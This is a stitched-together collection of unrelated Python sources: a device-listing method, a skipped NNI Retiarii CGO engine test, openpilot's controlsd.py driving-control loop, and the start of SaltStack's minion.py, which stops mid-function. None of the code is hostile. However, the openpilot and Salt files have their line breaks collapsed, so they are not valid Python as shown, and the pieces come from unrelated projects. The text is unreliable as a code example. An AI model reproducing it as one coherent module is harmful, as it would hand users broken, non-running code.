    def dump(self, filtered=[], header=[], connected_only=False, detected=False):
        """Print a table of DUTs (detected ones when detected=True, otherwise
        the configured ones), optionally restricted to `filtered` platforms
        and/or connected devices."""
        print("")
        table = []
        if detected:
            to_show = self.detected
        else:
            to_show = self.duts

        if not header:
            header = ["Platform", "ID", "Serial device"]
        for p in to_show:
            platform = p.platform
            connected = p.connected
            if filtered and platform not in filtered:
                continue

            if not connected_only or connected:
                table.append([platform, p.id, p.serial])

        print(tabulate(table, headers=header, tablefmt="github"))
# ---- begin concatenated module: test_cgo_engine.py ----
import json
import logging
import os
import sys
import threading
import time
import unittest
from pathlib import Path

import torch

# Deduplicated: `Model` and `model_to_pytorch_script` were each imported twice.
from nni.retiarii import Model, Node, submit_models
from nni.retiarii.codegen import model_to_pytorch_script
from nni.retiarii.execution.cgo_engine import CGOExecutionEngine
from nni.retiarii.execution.logical_optimizer.logical_plan import LogicalPlan
from nni.retiarii.execution.logical_optimizer.opt_dedup_input import DedupInputOptimizer
from nni.retiarii.evaluator.pytorch import PyTorchImageClassificationTrainer, PyTorchMultiModelTrainer
from nni.retiarii.integration import RetiariiAdvisor
from nni.retiarii.utils import import_


def _load_mnist(n_models: int = 1):
    """Load the converted MNIST model graph from the sibling JSON file.

    Returns the model itself when ``n_models == 1``; otherwise a list whose
    first element is the loaded model and whose remaining ``n_models - 1``
    elements are independent forks of it.
    """
    path = Path(__file__).parent / 'converted_mnist_pytorch.json'
    with open(path) as f:
        mnist_model = Model._load(json.load(f))
    if n_models == 1:
        return mnist_model
    # fork() yields an independent copy of the model graph for each extra slot
    return [mnist_model] + [mnist_model.fork() for _ in range(n_models - 1)]


@unittest.skip('Skipped in this version')
class CGOEngineTest(unittest.TestCase):

    def test_submit_models(self):
        """Submit two forked MNIST models and drive one trial through CGO."""
        os.environ['CGO'] = 'true'
        os.makedirs('generated', exist_ok=True)
        from nni.runtime import protocol, platform  # noqa: F401  (import registers the test platform)
        import nni.runtime.platform.test as tt
        # Loop the protocol back through a file so receive() reads what submit wrote.
        protocol._out_file = open('generated/debug_protocol_out_file.py', 'wb')
        protocol._in_file = open('generated/debug_protocol_out_file.py', 'rb')

        models = _load_mnist(2)
        advisor = RetiariiAdvisor()
        submit_models(*models)

        # The cross-graph (CGO) path needs at least two GPUs to exercise.
        if torch.cuda.is_available() and torch.cuda.device_count() >= 2:
            cmd, data = protocol.receive()
            params = json.loads(data)
            params['parameters']['training_kwargs']['max_steps'] = 100
            tt.init_params(params)

            # FIX: pass the callable itself, not its return value. The original
            # `target=CGOExecutionEngine.trial_execute_graph()` executed the
            # graph synchronously on this thread and then handed Thread a
            # non-callable result, so the worker thread could never run it.
            trial_thread = threading.Thread(target=CGOExecutionEngine.trial_execute_graph)
            trial_thread.start()
            last_metric = None
            while True:
                time.sleep(1)
                if tt._last_metric:
                    metric = tt.get_last_metric()
                    if metric == last_metric:
                        continue
                    advisor.handle_report_metric_data(metric)
                    last_metric = metric
                if not trial_thread.is_alive():
                    break
            trial_thread.join()

        advisor.stopping = True
        advisor.default_worker.join()
        advisor.assessor_worker.join()


if __name__ == '__main__':
    unittest.main()
controlsd.py
#!/usr/bin/env python3 import os import gc import requests import threading from cereal import car, log from selfdrive.crash import client from common.android import ANDROID, get_sound_card_online from common.numpy_fast import clip from common.realtime import sec_since_boot, set_realtime_priority, set_core_affinity, Ratekeeper, DT_CTRL from common.profiler import Profiler from common.params import Params, put_nonblocking import cereal.messaging as messaging from selfdrive.config import Conversions as CV from selfdrive.boardd.boardd import can_list_to_can_capnp from selfdrive.car.car_helpers import get_car, get_startup_event from selfdrive.controls.lib.drive_helpers import update_v_cruise, initialize_v_cruise from selfdrive.controls.lib.longcontrol import LongControl, STARTING_TARGET_SPEED from selfdrive.controls.lib.latcontrol_pid import LatControlPID from selfdrive.controls.lib.latcontrol_indi import LatControlINDI from selfdrive.controls.lib.latcontrol_lqr import LatControlLQR from selfdrive.controls.lib.events import Events, ET from selfdrive.controls.lib.alertmanager import AlertManager from selfdrive.controls.lib.vehicle_model import VehicleModel from selfdrive.controls.lib.planner import LON_MPC_STEP from selfdrive.locationd.calibration_helpers import Calibration from selfdrive.controls.lib.dynamic_follow.df_manager import dfManager from common.op_params import opParams LDW_MIN_SPEED = 31 * CV.MPH_TO_MS LANE_DEPARTURE_THRESHOLD = 0.1 STEER_ANGLE_SATURATION_TIMEOUT = 1.0 / DT_CTRL STEER_ANGLE_SATURATION_THRESHOLD = 2.5 # Degrees ThermalStatus = log.ThermalData.ThermalStatus State = log.ControlsState.OpenpilotState HwType = log.HealthData.HwType LongitudinalPlanSource = log.Plan.LongitudinalPlanSource Desire = log.PathPlan.Desire LaneChangeState = log.PathPlan.LaneChangeState LaneChangeDirection = log.PathPlan.LaneChangeDirection EventName = car.CarEvent.EventName def log_fingerprint(candidate, timeout=30): try: requests.get('https://sentry.io', 
timeout=timeout) client.captureMessage("fingerprinted {}".format(candidate), level='info') return except: pass class Controls: def __init__(self, sm=None, pm=None, can_sock=None): gc.disable() set_realtime_priority(53) set_core_affinity(3) # Setup sockets self.pm = pm if self.pm is None: self.pm = messaging.PubMaster(['sendcan', 'controlsState', 'carState', 'carControl', 'carEvents', 'carParams']) self.sm = sm if self.sm is None: self.sm = messaging.SubMaster(['thermal', 'health', 'frame', 'model', 'liveCalibration', 'dMonitoringState', 'plan', 'pathPlan', 'liveLocationKalman']) self.sm_smiskol = messaging.SubMaster(['radarState', 'dynamicFollowData', 'liveTracks', 'dynamicFollowButton', 'laneSpeed', 'dynamicCameraOffset', 'modelLongButton']) self.op_params = opParams() self.df_manager = dfManager(self.op_params) self.hide_auto_df_alerts = self.op_params.get('hide_auto_df_alerts') self.support_white_panda = self.op_params.get('support_white_panda') self.last_model_long = False self.can_sock = can_sock if can_sock is None: can_timeout = None if os.environ.get('NO_CAN_TIMEOUT', False) else 100 self.can_sock = messaging.sub_sock('can', timeout=can_timeout) # wait for one health and one CAN packet hw_type = messaging.recv_one(self.sm.sock['health']).health.hwType has_relay = hw_type in [HwType.blackPanda, HwType.uno, HwType.dos] print("Waiting for CAN messages...") messaging.get_one_can(self.can_sock) self.CI, self.CP, candidate = get_car(self.can_sock, self.pm.sock['sendcan'], has_relay) threading.Thread(target=log_fingerprint, args=[candidate]).start() # read params params = Params() self.is_metric = params.get("IsMetric", encoding='utf8') == "1" self.is_ldw_enabled = params.get("IsLdwEnabled", encoding='utf8') == "1" internet_needed = (params.get("Offroad_ConnectivityNeeded", encoding='utf8') is not None) and (params.get("DisableUpdates") != b"1") community_feature_toggle = params.get("CommunityFeaturesToggle", encoding='utf8') == "1" openpilot_enabled_toggle = 
params.get("OpenpilotEnabledToggle", encoding='utf8') == "1" passive = params.get("Passive", encoding='utf8') == "1" or \ internet_needed or not openpilot_enabled_toggle # detect sound card presence and ensure successful init sounds_available = not ANDROID or get_sound_card_online() car_recognized = self.CP.carName != 'mock' # If stock camera is disconnected, we loaded car controls and it's not dashcam mode controller_available = self.CP.enableCamera and self.CI.CC is not None and not passive community_feature_disallowed = self.CP.communityFeature and not community_feature_toggle self.read_only = not car_recognized or not controller_available or \ self.CP.dashcamOnly or community_feature_disallowed if self.read_only: self.CP.safetyModel = car.CarParams.SafetyModel.noOutput # Write CarParams for radard and boardd safety mode cp_bytes = self.CP.to_bytes() params.put("CarParams", cp_bytes) put_nonblocking("CarParamsCache", cp_bytes) put_nonblocking("LongitudinalControl", "1" if self.CP.openpilotLongitudinalControl else "0") self.CC = car.CarControl.new_message() self.AM = AlertManager() self.events = Events() self.LoC = LongControl(self.CP, self.CI.compute_gb, candidate) self.VM = VehicleModel(self.CP) if self.CP.lateralTuning.which() == 'pid': self.LaC = LatControlPID(self.CP) elif self.CP.lateralTuning.which() == 'indi': self.LaC = LatControlINDI(self.CP) elif self.CP.lateralTuning.which() == 'lqr': self.LaC = LatControlLQR(self.CP) self.state = State.disabled self.enabled = False self.active = False self.can_rcv_error = False self.soft_disable_timer = 0 self.v_cruise_kph = 255 self.v_cruise_kph_last = 0 self.mismatch_counter = 0 self.can_error_counter = 0 self.last_blinker_frame = 0 self.saturated_count = 0 self.distance_traveled = 0 self.events_prev = [] self.current_alert_types = [ET.PERMANENT] self.sm['liveCalibration'].calStatus = Calibration.INVALID self.sm['thermal'].freeSpace = 1. 
self.sm['dMonitoringState'].events = [] self.sm['dMonitoringState'].awarenessStatus = 1. self.sm['dMonitoringState'].faceDetected = False self.startup_event = get_startup_event(car_recognized, controller_available) if not sounds_available: self.events.add(EventName.soundsUnavailable, static=True) if internet_needed: self.events.add(EventName.internetConnectivityNeeded, static=True) if community_feature_disallowed: self.events.add(EventName.communityFeatureDisallowed, static=True) if self.read_only and not passive: self.events.add(EventName.carUnrecognized, static=True) if not self.support_white_panda: if hw_type == HwType.whitePanda: self.events.add(EventName.whitePandaUnsupported, static=True) # controlsd is driven by can recv, expected at 100Hz self.rk = Ratekeeper(100, print_delay_threshold=None) self.prof = Profiler(False) # off by default def update_events(self, CS): """Compute carEvents from carState""" self.events.clear() self.events.add_from_msg(CS.events) self.events.add_from_msg(self.sm['dMonitoringState'].events) # Handle startup event if self.startup_event is not None: self.events.add(self.startup_event) self.startup_event = None # Create events for battery, temperature, disk space, and memory if self.sm['thermal'].batteryPercent < 1 and self.sm['thermal'].chargingError: # at zero percent battery, while discharging, OP should not allowed self.events.add(EventName.lowBattery) if self.sm['thermal'].thermalStatus >= ThermalStatus.red: self.events.add(EventName.overheat) if self.sm['thermal'].freeSpace < 0.07: # under 7% of space free no enable allowed self.events.add(EventName.outOfSpace) if self.sm['thermal'].memUsedPercent > 90: self.events.add(EventName.lowMemory) # Handle calibration status cal_status = self.sm['liveCalibration'].calStatus if cal_status != Calibration.CALIBRATED: if cal_status == Calibration.UNCALIBRATED: self.events.add(EventName.calibrationIncomplete) else: self.events.add(EventName.calibrationInvalid) # Handle lane change if 
self.sm['pathPlan'].laneChangeState == LaneChangeState.preLaneChange: direction = self.sm['pathPlan'].laneChangeDirection if (CS.leftBlindspot and direction == LaneChangeDirection.left) or \ (CS.rightBlindspot and direction == LaneChangeDirection.right): self.events.add(EventName.laneChangeBlocked) else: if direction == LaneChangeDirection.left: self.events.add(EventName.preLaneChangeLeft) else: self.events.add(EventName.preLaneChangeRight) elif self.sm['pathPlan'].laneChangeState in [LaneChangeState.laneChangeStarting, LaneChangeState.laneChangeFinishing]: self.events.add(EventName.laneChange) if self.can_rcv_error or (not CS.canValid and self.sm.frame > 5 / DT_CTRL): self.events.add(EventName.canError) if self.mismatch_counter >= 200: self.events.add(EventName.controlsMismatch) if not self.sm.alive['plan'] and self.sm.alive['pathPlan']: # only plan not being received: radar not communicating self.events.add(EventName.radarCommIssue) elif not self.sm.all_alive_and_valid(): self.events.add(EventName.commIssue) if not self.sm['pathPlan'].mpcSolutionValid: self.events.add(EventName.plannerError) if not self.sm['liveLocationKalman'].sensorsOK and os.getenv("NOSENSOR") is None: if self.sm.frame > 5 / DT_CTRL: # Give locationd some time to receive all the inputs self.events.add(EventName.sensorDataInvalid) if not self.sm['liveLocationKalman'].gpsOK and (self.distance_traveled > 1000) and os.getenv("NOSENSOR") is None and not self.support_white_panda: # Not show in first 1 km to allow for driving out of garage. 
This event shows after 5 minutes self.events.add(EventName.noGps) if not self.sm['pathPlan'].paramsValid: self.events.add(EventName.vehicleModelInvalid) if not self.sm['liveLocationKalman'].posenetOK: self.events.add(EventName.posenetInvalid) if not self.sm['frame'].recoverState < 2: # counter>=2 is active self.events.add(EventName.focusRecoverActive) if not self.sm['plan'].radarValid: self.events.add(EventName.radarFault) if self.sm['plan'].radarCanError: self.events.add(EventName.radarCanError) if log.HealthData.FaultType.relayMalfunction in self.sm['health'].faults: self.events.add(EventName.relayMalfunction) if self.sm['plan'].fcw: self.events.add(EventName.fcw) if self.sm['model'].frameDropPerc > 1: self.events.add(EventName.modeldLagging) # Only allow engagement with brake pressed when stopped behind another stopped car if CS.brakePressed and self.sm['plan'].vTargetFuture >= STARTING_TARGET_SPEED \ and not self.CP.radarOffCan and CS.vEgo < 0.3: self.events.add(EventName.noTarget) self.add_stock_additions_alerts(CS) def add_stock_additions_alerts(self, CS): self.AM.SA_set_frame(self.sm.frame) self.AM.SA_set_enabled(self.enabled) # alert priority is defined by code location, keeping is highest, then lane speed alert, then auto-df alert if self.sm_smiskol['modelLongButton'].enabled != self.last_model_long: extra_text_1 = 'disabled!' if self.last_model_long else 'enabled!' 
extra_text_2 = '' if self.last_model_long else ', model may behave unexpectedly' self.AM.SA_add('modelLongAlert', extra_text_1=extra_text_1, extra_text_2=extra_text_2) return if self.sm_smiskol['dynamicCameraOffset'].keepingLeft: self.AM.SA_add('laneSpeedKeeping', extra_text_1='LEFT', extra_text_2='Oncoming traffic in right lane') return elif self.sm_smiskol['dynamicCameraOffset'].keepingRight: self.AM.SA_add('laneSpeedKeeping', extra_text_1='RIGHT', extra_text_2='Oncoming traffic in left lane') return ls_state = self.sm_smiskol['laneSpeed'].state if ls_state != '': self.AM.SA_add('lsButtonAlert', extra_text_1=ls_state) return faster_lane = self.sm_smiskol['laneSpeed'].fastestLane if faster_lane in ['left', 'right']: ls_alert = 'laneSpeedAlert' if not self.sm_smiskol['laneSpeed'].new: ls_alert += 'Silent' self.AM.SA_add(ls_alert, extra_text_1='{} lane faster'.format(faster_lane).upper(), extra_text_2='Change lanes to faster {} lane'.format(faster_lane)) return df_out = self.df_manager.update() if df_out.changed: df_alert = 'dfButtonAlert' if df_out.is_auto and df_out.last_is_auto: # only show auto alert if engaged, not hiding auto, and time since lane speed alert not showing if CS.cruiseState.enabled and not self.hide_auto_df_alerts: df_alert += 'Silent' self.AM.SA_add(df_alert, extra_text_1=df_out.model_profile_text + ' (auto)') return else: self.AM.SA_add(df_alert, extra_text_1=df_out.user_profile_text, extra_text_2='Dynamic follow: {} profile active'.format(df_out.user_profile_text)) return def data_sample(self): """Receive data from sockets and update carState""" # Update carState from CAN can_strs = messaging.drain_sock_raw(self.can_sock, wait_for_one=True) CS = self.CI.update(self.CC, can_strs) self.sm.update(0) self.sm_smiskol.update(0) # Check for CAN timeout if not can_strs: self.can_error_counter += 1 self.can_rcv_error = True else: self.can_rcv_error = False # When the panda and controlsd do not agree on controls_allowed # we want to disengage openpilot. 
However the status from the panda goes through # another socket other than the CAN messages and one can arrive earlier than the other. # Therefore we allow a mismatch for two samples, then we trigger the disengagement. if not self.enabled: self.mismatch_counter = 0 if not self.sm['health'].controlsAllowed and self.enabled: self.mismatch_counter += 1 self.distance_traveled += CS.vEgo * DT_CTRL return CS def state_transition(self, CS): """Compute conditional state transitions and execute actions on state transitions""" self.v_cruise_kph_last = self.v_cruise_kph # if stock cruise is completely disabled, then we can use our own set speed logic if not self.CP.enableCruise: self.v_cruise_kph = update_v_cruise(self.v_cruise_kph, CS.buttonEvents, self.enabled) elif self.CP.enableCruise and CS.cruiseState.enabled: self.v_cruise_kph = CS.cruiseState.speed * CV.MS_TO_KPH # decrease the soft disable timer at every step, as it's reset on # entrance in SOFT_DISABLING state self.soft_disable_timer = max(0, self.soft_disable_timer - 1) self.current_alert_types = [ET.PERMANENT] # ENABLED, PRE ENABLING, SOFT DISABLING if self.state != State.disabled: # user and immediate disable always have priority in a non-disabled state if self.events.any(ET.USER_DISABLE): self.state = State.disabled self.current_alert_types.append(ET.USER_DISABLE) elif self.events.any(ET.IMMEDIATE_DISABLE): self.state = State.disabled self.current_alert_types.append(ET.IMMEDIATE_DISABLE) else: # ENABLED if self.state == State.enabled: if self.events.any(ET.SOFT_DISABLE): self.state = State.softDisabling self.soft_disable_timer = 300 # 3s self.current_alert_types.append(ET.SOFT_DISABLE) # SOFT DISABLING elif self.state == State.softDisabling: if not self.events.any(ET.SOFT_DISABLE): # no more soft disabling condition, so go back to ENABLED self.state = State.enabled elif self.events.any(ET.SOFT_DISABLE) and self.soft_disable_timer > 0: self.current_alert_types.append(ET.SOFT_DISABLE) elif self.soft_disable_timer 
<= 0: self.state = State.disabled # PRE ENABLING elif self.state == State.preEnabled: if not self.events.any(ET.PRE_ENABLE): self.state = State.enabled else: self.current_alert_types.append(ET.PRE_ENABLE) # DISABLED elif self.state == State.disabled: if self.events.any(ET.ENABLE): if self.events.any(ET.NO_ENTRY): self.current_alert_types.append(ET.NO_ENTRY) else: if self.events.any(ET.PRE_ENABLE): self.state = State.preEnabled else: self.state = State.enabled self.current_alert_types.append(ET.ENABLE) self.v_cruise_kph = initialize_v_cruise(CS.vEgo, CS.buttonEvents, self.v_cruise_kph_last) # Check if actuators are enabled self.active = self.state == State.enabled or self.state == State.softDisabling if self.active: self.current_alert_types.append(ET.WARNING) # Check if openpilot is engaged self.enabled = self.active or self.state == State.preEnabled def state_control(self, CS): """Given the state, this function returns an actuators packet""" plan = self.sm['plan'] path_plan = self.sm['pathPlan'] actuators = car.CarControl.Actuators.new_message() if CS.leftBlinker or CS.rightBlinker: self.last_blinker_frame = self.sm.frame # State specific actions if not self.active: self.LaC.reset() self.LoC.reset(v_pid=plan.vTargetFuture) plan_age = DT_CTRL * (self.sm.frame - self.sm.rcv_frame['plan']) # no greater than dt mpc + dt, to prevent too high extraps dt = min(plan_age, LON_MPC_STEP + DT_CTRL) + DT_CTRL a_acc_sol = plan.aStart + (dt / LON_MPC_STEP) * (plan.aTarget - plan.aStart) v_acc_sol = plan.vStart + dt * (a_acc_sol + plan.aStart) / 2.0 extras_loc = {'lead_one': self.sm_smiskol['radarState'].leadOne, 'mpc_TR': self.sm_smiskol['dynamicFollowData'].mpcTR, 'live_tracks': self.sm_smiskol['liveTracks'], 'has_lead': plan.hasLead} # Gas/Brake PID loop actuators.gas, actuators.brake = self.LoC.update(self.active, CS, v_acc_sol, plan.vTargetFuture, a_acc_sol, self.CP, extras_loc) # Steering PID loop and lateral MPC actuators.steer, actuators.steerAngle, lac_log = 
self.LaC.update(self.active, CS, self.CP, path_plan) # Check for difference between desired angle and angle for angle based control angle_control_saturated = self.CP.steerControlType == car.CarParams.SteerControlType.angle and \ abs(actuators.steerAngle - CS.steeringAngle) > STEER_ANGLE_SATURATION_THRESHOLD if angle_control_saturated and not CS.steeringPressed and self.active: self.saturated_count += 1 else: self.saturated_count = 0 # Send a "steering required alert" if saturation count has reached the limit if (lac_log.saturated and not CS.steeringPressed) or \ (self.saturated_count > STEER_ANGLE_SATURATION_TIMEOUT): # Check if we deviated from the path left_deviation = actuators.steer > 0 and path_plan.dPoly[3] > 0.1 right_deviation = actuators.steer < 0 and path_plan.dPoly[3] < -0.1 if left_deviation or right_deviation: self.events.add(EventName.steerSaturated) return actuators, v_acc_sol, a_acc_sol, lac_log def publish_logs(self, CS, start_time, actuators, v_acc, a_acc, lac_log): """Send actuators and hud commands to the car, send controlsstate and MPC logging""" CC = car.CarControl.new_message() CC.enabled = self.enabled CC.actuators = actuators CC.cruiseControl.override = True CC.cruiseControl.cancel = not self.CP.enableCruise or (not self.enabled and CS.cruiseState.enabled) # Some override values for Honda # brake discount removes a sharp nonlinearity brake_discount = (1.0 - clip(actuators.brake * 3., 0.0, 1.0)) speed_override = max(0.0, (self.LoC.v_pid + CS.cruiseState.speedOffset) * brake_discount) CC.cruiseControl.speedOverride = float(speed_override if self.CP.enableCruise else 0.0) CC.cruiseControl.accelOverride = self.CI.calc_accel_override(CS.aEgo, self.sm['plan'].aTarget, CS.vEgo, self.sm['plan'].vTarget) CC.hudControl.setSpeed = float(self.v_cruise_kph * CV.KPH_TO_MS) CC.hudControl.speedVisible = self.enabled CC.hudControl.lanesVisible = self.enabled CC.hudControl.leadVisible = self.sm['plan'].hasLead right_lane_visible = self.sm['pathPlan'].rProb > 
0.5 left_lane_visible = self.sm['pathPlan'].lProb > 0.5 CC.hudControl.rightLaneVisible = bool(right_lane_visible) CC.hudControl.leftLaneVisible = bool(left_lane_visible) recent_blinker = (self.sm.frame - self.last_blinker_frame) * DT_CTRL < 5.0 # 5s blinker cooldown ldw_allowed = self.is_ldw_enabled and CS.vEgo > LDW_MIN_SPEED and not recent_blinker \ and not self.active and self.sm['liveCalibration'].calStatus == Calibration.CALIBRATED meta = self.sm['model'].meta if len(meta.desirePrediction) and ldw_allowed: l_lane_change_prob = meta.desirePrediction[Desire.laneChangeLeft - 1] r_lane_change_prob = meta.desirePrediction[Desire.laneChangeRight - 1] CAMERA_OFFSET = self.op_params.get('camera_offset') l_lane_close = left_lane_visible and (self.sm['pathPlan'].lPoly[3] < (1.08 - CAMERA_OFFSET)) r_lane_close = right_lane_visible and (self.sm['pathPlan'].rPoly[3] > -(1.08 + CAMERA_OFFSET)) CC.hudControl.leftLaneDepart = bool(l_lane_change_prob > LANE_DEPARTURE_THRESHOLD and l_lane_close) CC.hudControl.rightLaneDepart = bool(r_lane_change_prob > LANE_DEPARTURE_THRESHOLD and r_lane_close) if CC.hudControl.rightLaneDepart or CC.hudControl.leftLaneDepart: self.events.add(EventName.ldw) alerts = self.events.create_alerts(self.current_alert_types, [self.CP, self.sm, self.is_metric]) self.AM.add_many(self.sm.frame, alerts, self.enabled) self.last_model_long = self.sm_smiskol['modelLongButton'].enabled self.AM.process_alerts(self.sm.frame) CC.hudControl.visualAlert = self.AM.visual_alert if not self.read_only: # send car controls over can can_sends = self.CI.apply(CC) self.pm.send('sendcan', can_list_to_can_capnp(can_sends, msgtype='sendcan', valid=CS.canValid)) force_decel = (self.sm['dMonitoringState'].awarenessStatus < 0.) 
or \ (self.state == State.softDisabling) steer_angle_rad = (CS.steeringAngle - self.sm['pathPlan'].angleOffset) * CV.DEG_TO_RAD # controlsState dat = messaging.new_message('controlsState') dat.valid = CS.canValid controlsState = dat.controlsState controlsState.alertText1 = self.AM.alert_text_1 controlsState.alertText2 = self.AM.alert_text_2 controlsState.alertSize = self.AM.alert_size controlsState.alertStatus = self.AM.alert_status controlsState.alertBlinkingRate = self.AM.alert_rate controlsState.alertType = self.AM.alert_type controlsState.alertSound = self.AM.audible_alert controlsState.driverMonitoringOn = self.sm['dMonitoringState'].faceDetected controlsState.canMonoTimes = list(CS.canMonoTimes) controlsState.planMonoTime = self.sm.logMonoTime['plan'] controlsState.pathPlanMonoTime = self.sm.logMonoTime['pathPlan'] controlsState.enabled = self.enabled controlsState.active = self.active controlsState.vEgo = CS.vEgo controlsState.vEgoRaw = CS.vEgoRaw controlsState.angleSteers = CS.steeringAngle controlsState.curvature = self.VM.calc_curvature(steer_angle_rad, CS.vEgo) controlsState.steerOverride = CS.steeringPressed controlsState.state = self.state controlsState.engageable = not self.events.any(ET.NO_ENTRY) controlsState.longControlState = self.LoC.long_control_state controlsState.vPid = float(self.LoC.v_pid) controlsState.vCruise = float(self.v_cruise_kph) controlsState.upAccelCmd = float(self.LoC.pid.p) controlsState.uiAccelCmd = float(self.LoC.pid.id) controlsState.ufAccelCmd = float(self.LoC.pid.f) controlsState.angleSteersDes = float(self.LaC.angle_steers_des) controlsState.vTargetLead = float(v_acc) controlsState.aTarget = float(a_acc) controlsState.jerkFactor = float(self.sm['plan'].jerkFactor) controlsState.gpsPlannerActive = self.sm['plan'].gpsPlannerActive controlsState.vCurvature = self.sm['plan'].vCurvature controlsState.decelForModel = self.sm['plan'].longitudinalPlanSource == LongitudinalPlanSource.model controlsState.cumLagMs = -self.rk.remaining 
* 1000. controlsState.startMonoTime = int(start_time * 1e9) controlsState.mapValid = self.sm['plan'].mapValid controlsState.forceDecel = bool(force_decel) controlsState.canErrorCounter = self.can_error_counter if self.CP.lateralTuning.which() == 'pid': controlsState.lateralControlState.pidState = lac_log elif self.CP.lateralTuning.which() == 'lqr': controlsState.lateralControlState.lqrState = lac_log elif self.CP.lateralTuning.which() == 'indi': controlsState.lateralControlState.indiState = lac_log self.pm.send('controlsState', dat) # carState car_events = self.events.to_msg() cs_send = messaging.new_message('carState') cs_send.valid = CS.canValid cs_send.carState = CS cs_send.carState.events = car_events self.pm.send('carState', cs_send) # carEvents - logged every second or on change if (self.sm.frame % int(1. / DT_CTRL) == 0) or (self.events.names != self.events_prev): ce_send = messaging.new_message('carEvents', len(self.events)) ce_send.carEvents = car_events self.pm.send('carEvents', ce_send) self.events_prev = self.events.names.copy() # carParams - logged every 50 seconds (> 1 per segment) if (self.sm.frame % int(50. 
/ DT_CTRL) == 0): cp_send = messaging.new_message('carParams') cp_send.carParams = self.CP self.pm.send('carParams', cp_send) # carControl cc_send = messaging.new_message('carControl') cc_send.valid = CS.canValid cc_send.carControl = CC self.pm.send('carControl', cc_send) # copy CarControl to pass to CarInterface on the next iteration self.CC = CC def step(self): start_time = sec_since_boot() self.prof.checkpoint("Ratekeeper", ignore=True) # Sample data from sockets and get a carState CS = self.data_sample() self.prof.checkpoint("Sample") self.update_events(CS) if not self.read_only: # Update control state self.state_transition(CS) self.prof.checkpoint("State transition") # Compute actuators (runs PID loops and lateral MPC) actuators, v_acc, a_acc, lac_log = self.state_control(CS) self.prof.checkpoint("State Control") # Publish data self.publish_logs(CS, start_time, actuators, v_acc, a_acc, lac_log) self.prof.checkpoint("Sent") def controlsd_thread(self): while True: self.step() self.rk.monitor_time() self.prof.display() def main(sm=None, pm=None, logcan=None): controls = Controls(sm, pm, logcan) controls.controlsd_thread() if __name__ == "__main__": main()
minion.py
# -*- coding: utf-8 -*- ''' Routines to set up a minion ''' # Import python libs from __future__ import absolute_import from __future__ import print_function import copy import errno import fnmatch import hashlib import logging import multiprocessing import os import re import salt import signal import sys import threading import time import traceback import types from random import randint, shuffle from salt.ext.six.moves import range # Import third party libs try: import zmq HAS_ZMQ = True except ImportError: # Running in local, zmq not needed HAS_ZMQ = False HAS_RANGE = False try: import seco.range HAS_RANGE = True except ImportError: pass HAS_PSUTIL = False try: import psutil HAS_PSUTIL = True except ImportError: pass HAS_RESOURCE = False try: import resource HAS_RESOURCE = True except ImportError: pass # Import salt libs from salt.exceptions import ( AuthenticationError, CommandExecutionError, CommandNotFoundError, SaltInvocationError, SaltReqTimeoutError, SaltClientError, SaltSystemExit, SaltSyndicMasterError ) import salt.client import salt.crypt import salt.loader import salt.payload import salt.utils import salt.utils.jid import salt.utils.args import salt.utils.event import salt.utils.minion import salt.utils.schedule import salt.utils.zeromq import salt.defaults.exitcodes from salt.defaults import DEFAULT_TARGET_DELIM from salt.ext.six import string_types from salt.utils.debug import enable_sigusr1_handler from salt.utils.event import tagify import salt.syspaths log = logging.getLogger(__name__) # To set up a minion: # 1. Read in the configuration # 2. Generate the function mapping dict # 3. Authenticate with the master # 4. Store the AES key # 5. Connect to the publisher # 6. 
Handle publications def resolve_dns(opts): ''' Resolves the master_ip and master_uri options ''' ret = {} check_dns = True if (opts.get('file_client', 'remote') == 'local' and not opts.get('use_master_when_local', False)): check_dns = False if check_dns is True: # Because I import salt.log below I need to re-import salt.utils here import salt.utils try: ret['master_ip'] = \ salt.utils.dns_check(opts['master'], True, opts['ipv6']) except SaltClientError: if opts['retry_dns']: while True: import salt.log msg = ('Master hostname: \'{0}\' not found. Retrying in {1} ' 'seconds').format(opts['master'], opts['retry_dns']) if salt.log.is_console_configured(): log.error(msg) else: print('WARNING: {0}'.format(msg)) time.sleep(opts['retry_dns']) try: ret['master_ip'] = salt.utils.dns_check( opts['master'], True, opts['ipv6'] ) break except SaltClientError: pass else: ret['master_ip'] = '127.0.0.1' except SaltSystemExit: err = 'Master address: {0} could not be resolved. Invalid or unresolveable address.'.format( opts.get('master', 'Unknown')) log.error(err) raise SaltSystemExit(code=42, msg=err) else: ret['master_ip'] = '127.0.0.1' if 'master_ip' in ret and 'master_ip' in opts: if ret['master_ip'] != opts['master_ip']: log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'], ret['master_ip']) ) ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'], port=opts['master_port']) return ret def get_proc_dir(cachedir): ''' Given the cache directory, return the directory that process data is stored in, creating it if it doesn't exist. ''' fn_ = os.path.join(cachedir, 'proc') if not os.path.isdir(fn_): # proc_dir is not present, create it os.makedirs(fn_) return fn_ def parse_args_and_kwargs(func, args, data=None): ''' Wrap load_args_and_kwargs ''' salt.utils.warn_until( 'Boron', 'salt.minion.parse_args_and_kwargs() has been renamed to ' 'salt.minion.load_args_and_kwargs(). Please change this function call ' 'before the Boron release of Salt.' 
) return load_args_and_kwargs(func, args, data=data) def load_args_and_kwargs(func, args, data=None): ''' Detect the args and kwargs that need to be passed to a function call, and check them against what was passed. ''' argspec = salt.utils.args.get_function_argspec(func) _args = [] _kwargs = {} invalid_kwargs = [] for arg in args: if isinstance(arg, string_types): string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632 if string_arg: # Don't append the version that was just derived from parse_cli # above, that would result in a 2nd call to # salt.utils.cli.yamlify_arg(), which could mangle the input. _args.append(arg) elif string_kwarg: salt.utils.warn_until( 'Boron', 'The list of function args and kwargs should be parsed ' 'by salt.utils.args.parse_input() before calling ' 'salt.minion.load_args_and_kwargs().' ) if argspec.keywords or next(iter(string_kwarg.keys())) in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs.update(string_kwarg) else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. invalid_kwargs.append('{0}'.format(arg)) continue # if the arg is a dict with __kwarg__ == True, then its a kwarg elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True: for key, val in arg.items(): if argspec.keywords or key in argspec.args: # Function supports **kwargs or is a positional argument to # the function. _kwargs[key] = val else: # **kwargs not in argspec and parsed argument name not in # list of positional arguments. This keyword argument is # invalid. 
